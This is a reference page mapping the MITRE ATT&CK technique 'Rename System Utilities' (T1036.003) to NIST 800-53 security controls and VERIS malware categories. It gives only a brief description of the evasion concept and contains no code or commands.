T1036.003 Rename System Utilities Mappings

Adversaries may rename legitimate system utilities to try to evade security mechanisms concerning the usage of those utilities. Security monitoring and control mechanisms may be in place for system utilities adversaries are capable of abusing. (Citation: LOLBAS Main Site) It may be possible to bypass those security mechanisms by renaming the utility prior to utilization (ex: rename <code>rundll32.exe</code>). (Citation: Elastic Masquerade Ball) An alternative case occurs when a legitimate utility is copied or moved to a different directory and renamed to avoid detections based on system utilities executing from non-standard paths. (Citation: F-Secure CozyDuke)

View in MITRE ATT&CK®

Mappings

Capability ID Capability Description Mapping Type ATT&CK ID ATT&CK Name
AC-2 Account Management Protects T1036.003 Rename System Utilities
AC-3 Access Enforcement Protects T1036.003 Rename System Utilities
AC-6 Least Privilege Protects T1036.003 Rename System Utilities
CA-7 Continuous Monitoring Protects T1036.003 Rename System Utilities
CM-2 Baseline Configuration Protects T1036.003 Rename System Utilities
CM-6 Configuration Settings Protects T1036.003 Rename System Utilities
SI-3 Malicious Code Protection Protects T1036.003 Rename System Utilities
SI-4 System Monitoring Protects T1036.003 Rename System Utilities
action.malware.variety.Disable controls Disable or interfere with security controls related-to T1036.003 Masquerading: Rename System Utilities
action.malware.variety.Rootkit Rootkit (maintain local privileges and stealth) related-to T1036.003 Masquerading: Rename System Utilities